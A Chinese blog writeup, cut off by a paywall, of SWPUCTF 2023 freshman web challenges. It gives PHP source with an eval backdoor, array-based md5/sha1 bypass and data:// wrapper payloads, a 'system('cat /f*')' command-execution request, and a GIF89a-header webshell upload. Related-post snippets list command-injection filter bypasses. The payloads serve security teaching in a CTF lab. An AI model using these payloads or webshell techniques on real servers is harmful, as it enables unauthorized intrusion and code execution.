[SWPUCTF 2023 秋季新生赛]——Web方向 详细Writeup

原创 已于 2023-10-22 14:40:55 修改 · 2.4k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #web安全 #php #CTF #SWPU

于 2023-10-22 01:14:08 首次发布
本文围绕Web CTF题目展开,涵盖colorful_snake、NSS_HTTP_CHEKER等多个题目。涉及利用网站转换、绕过加密、文件上传、反序列化、无回显RCE、SQL注入等多种解题方法,还介绍了通过构造payload、利用魔术方法、使用DNSlog外带数据、报错注入、爆破等技巧获取flag。

Web

colorful_snake

来玩贪吃蛇~

F12查看源代码,可以看到this_is_real_flag函数,发现是unicode编码

image-20231019080029726

利用网站转换得到flag

image-20231019080055922

一键连接!

连连need

<?php
highlight_file(__FILE__);
error_reporting(0);
$md5_1 = $_GET['md5_1'];
$md5_2 = $_GET['md5_2'];
$sha1_1 = $_GET['sha1_1'];
$sha1_2 = $_GET['sha1_2'];
$new_player =$_GET['new_player'];
if ($md5_1 !== $md5_2 && md5($md5_1) === md5($md5_2)) {
   
   
    if ($sha1_1 != $sha1_2 && sha1($sha1_1) === sha1($sha1_2)) {
   
   
        if (file_get_contents($new_player) === "Welcome to NSSCTF!!!") {
   
   
            echo "Congratulations~~~~~~~~~";
            echo "试试need Antsword<br/>";
            @eval($_POST['Nss']);
        }else{
   
   
            echo "可曾听过data协议?";
        }
    } else {
   
   
        echo "sha1又如何相等呢";
    }
} else {
   
   
    echo "如何让md5值相等呢¿";
}

第一 层要让md5_1md5_2经过md5加密后强比较类型相等,并且md5_1不等于md5_2,这里可以用数组绕过

构造payload

?md5_1[]=1&md5_2[]=2

第二层便是绕过sha1加密,这里也可以用数组

payload:

sha1_1[]=3&sha1_2[]=4

接下来可以看到file_get_contents,这个函数的内容就是显示文件内容,可以利用data协议传入数据流

payload:

new_player=data://text/plain,Welcome to NSSCTF!!!

接下来利用Nss来进行RCE即可,最后发包如下

?md5_1[]=1&md5_2[]=2&sha1_1[]=3&sha1_2[]=4&new_player=data://text/plain,Welcome to NSSCTF!!!

POST DATA:
Nss=system('cat /f*');

image-20231019084245373

NSS_HTTP_CHEKER

来看看你的HTTP知识储备!

image-20231019084418065

好好好,喜欢这种,直接秒了

Burp发包如下

image-20231019084817744

ez_talk

文件上传,先直接上传个php文件

image-20231019133823355

试一试修改MIME类型,但是被过滤

image-20231019133932588

猜测是不是有文件头检测,添加文件头GIF89a?可以看到绕过,路径被翻转

image-20231019134158540

直接访问

http://node6.anna.nssctf.cn:28908/uploads/shell.php

可以看到已经挂马成功,直接RCE得到flag

image-20231019134435505

Pingpingping

程序未响应

<?php
highlight_file(__FILE__);
error_reporting(0);
$_ping = $_GET['Ping_ip.exe'
最低0.47元/天 解锁文章
[SWPUCTF 2023 秋季新生]NSS大卖场 题解
weixin_73904941的博客
10-23 656
[SWPUCTF 2023 秋季新生]NSS大卖场 题解 空格绕过_正则表达式大小写绕过
2023SWPU NSS 秋季招新 (校外道)-没做出来的writeup
书山有路勤为径,学海无涯苦作舟
06-25 1219
第一个点,就是绕过第二个if,这里直接变量覆盖即可,当然GET和POST都发送wq是不行的,在POST中发送pucky即可。在进入unserialize之后,__wakeup()会进行赋值,如果molly===yuki那么即可得到flag。看来我们需要让wq等于二仙桥来进入第一个if语句,然后再绕过第二个if语句,进行反序列化。然后在反序列化的时候采取引用绕过的方式,exp如下。这题没啥可说了,反序列化之前也专门练过了。hint有提示备份文件,直接访问。看这个大佬的手工注入,nb呀。这个 dll 文件中。
[SWPUCTF 2023 秋季新生] web题解
rev1ve的博客
10-21 3204
然后就是上传的时候有两个if语句,第一个成立,第二个不成立。由于GET和POST传同一个参数没有先后顺序,所以不能用下面的方式去实现变量覆盖。分析一下,MD5和sha1都可以用数组绕过,然后用php伪协议中的data协议。分析一下,首先是参数名利用php解析特性;强等于,但是__wakeup方法会赋值,所以采取引用绕过的方式,exp如下。我们可以bp抓包,依次再三个参数fuzz测试(在页面处输入不了。考点:源码泄露,变量引用绕过__wakeup,php变量覆盖。打开题目,先试试普通一句话木马,发现被检测。
WEB-2025 SWPU-NSSCTF部分题解
2401_87876265的博客
09-22 1847
书接上文。五、finalrce在开始分析题目之前我先附上一段我之前学rce记的一些笔记(如果有问题可以在评论区纠正)。空格绕过:#常见的绕过符号有:$IFS$9、{$IFS}、%09(php环境下)、重定向符反引号绕过:` `cat的反向操作:tac1、无字母数字RCE无字母数字RCE是指在不使用任何字母(a-zA-Z)和数字(0-9)的情况下实现代码执行的技巧。这种技术在以下场景特别有用:·过滤了所有字母和数字的CTF题目·严格的WAF规则过滤了常规payload。
[SWPUCTF 2023 秋季新生]web(详解)
m0_63641882的博客
11-04 510
新知识点// 1.tee命令的使用 2. 数组绕过的原理 3. data协议的使用4. php的非法传参。
[SWPUCTF 2023 秋季新生] WEB 部分题目复现
m0_63138919的博客
10-22 585
本文为2023SWPU NSS 秋季招新 (校外道) 的部分题解复现 针对自己没做出来的
NSSCTF-2023SWPU NSS秋季招新(校外道)-colorful_snake
qq_68581192的博客
10-14 985
发现有function this_is_flag字样,复制encodedStriing内的内容,去搜索。两个都试一下,发现只有第二个的flag能成功。发现是ASCII码,找到在线转换ASCII。右键点击检查,找到Source。
[SWPUCTF 2023 秋季新生]Caesar_base
06-13
我们正在讨论CTF中的题目,特别是SWPUCTF2023秋季新生中的Caesar_base题目。根据之前的引用,我们有一些关于SWPUCTF的参考资料,但需要注意的是,这些引用主要是关于2022年和2021年的题目,以及2024年新生的...
[SWPUCTF 2021 新生]include
2301_80243833的博客
07-29 596
例如:php://filter/read=convert.base64-encode/resource=upload.php,表示读取 upload.php 的内容并进行 base64 编码。另外还有一些字符串过滤器,如 string.rot13(进行 rot13 转换)、string.toupper(将字符全部大写)、string.tolower(将字符全部小写)、string.strip_tags(去除空字符、html 和 php 标记后的结果)等。接着我们用PHP伪协议来解决本题。
[SWPUCTF 2025 秋季新生]ezez_include
最新发布
11-20
ezez_include是SWPUCTF 2025秋季新生中的一个Web安全题目,主要考察文件包含漏洞(File Inclusion Vulnerability)。这类题目在CTF中常见,涉及利用PHP的文件包含函数(如`include()`或`require()`)来读取...
SWPUCTF 2023
y2xsec的博客
12-04 269
日常练习,其他方向的wp后续给出。
2023SWPU NSS 秋季招新 CTF Reverse‘方向WP详解
Sciurdae的博客
10-20 1977
无壳64bit文件,,ida64分析标准的base64,
2023SWPU NSS 秋季招新 PWN
Xzzzz911的博客
10-20 970
西南石油大学举办的一场新生,总体来说举办的不错,支持支持,明年再来!!!这次比总体不错,RE和CRYPTO都做了些,可惜的就是PWN没有ak,暴露出了自己的弱点,还是要慢慢沉淀,对汇编还真的不是很熟,加油吧,冲冲冲!!!
SWPUCTF2019 web1
zydbk123456的博客
04-26 419
#[SWPUCTF 2019] web1 1.登录页面 进来首先是个登录页面,一开始尝试用admin登录并用暴力破解得出密码,但是好像破解不出密码。 看到下面有个注册页面,点开注册一个账号就可以登录了。登录后,点开广告申请,发现有点不对劲。一开始看到文本框,想到了xss,试过几个xss payload,发现应该和xss无关。。。想到sql注入,但不知道怎么构造绕过的payload。看了网上大佬...
NSSCTF-[SWPUCTF 2023 秋季新生]-web
J1ng_Hong的博客
11-19 1500
发现需要md5值相等,一开始想到的是:用0e开头的md5值为0进行比较,但是尝试了发现不行。用burp抓包看看信息,发现了每次买道具都是/buy/n,其中n是商品代号。然后我们直接在网页上payload,因为burp里payload发不出去了。但是由于if和else只能执行一个,而且$被ban了,所以a和b的值不能手动改。发现可以,然后需要蚁剑连接。进题是一个大卖场,我看了hint,发现给了一个username,以为是正常的sql注入,但是发现没有回显。然后把金额改成1元,买了flag然后去背包看看就行。
NSSCTF-2023SWPU NSS秋季招新(校外道)-NSS_HTTP_CHEKER
qq_68581192的博客
10-14 1217
先将抓的包发送给Repeater(重发器),在Repeater里进行传参等,点击发送,右边板块点击render,找出flag。根据要求,我们将GET传参,POST传参,Cookie传参,使用NSSCTF客户浏览器,使用本地网络访问。我们可以利用burpsuite进行抓包,对上面的要求进行更改,打开burp,抓到的包如下。
[SWPUCTF 2021 新生]web方向(一到六题) 解题思路,实操解析,解题软件使用,解题方法教程
符啸九天的博客
09-07 1861
[SWPUCTF 2021 新生]web方向 解题思路,实操解析,解题软件安装教程,解题方法教程。 [SWPUCTF 2021 新生]gift_F12、[SWPUCTF 2021 新生]jicao、[SWPUCTF 2021 新生]easy_md5、[SWPUCTF 2021 新生]include、[SWPUCTF 2021 新生]easy_sql
[SWPUCTF 2023 秋季新生]Pingpingping
dalaojiaoweb的博客
09-04 748
在payload中我们使用了“||”符号,“||” 是一个管道操作符,它用于在命令行中执行多个命令,当前一个命令执行成功时,才会执行后一个命令。这里我测试的是任何ip都可以。可以看到我们这里面的ping命令形式是不完整的,所以我们必须要先补全我们的ping命令再进行cat命令抓取。那么很明了的思路就是使用我们的cat命令抓取我们的flag。,它被转化为_之后,后面的字符就会被保留下来不会被替换。直接给出了我们的源代码,我来简单的进行一些代码解说。所以我们必须先转义前面的字符,以防止后面的点被转义。
WebSWPUCTF 2023 秋季新生 个人复现
uuzeray的博客
11-17 1131
复现套新题试试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值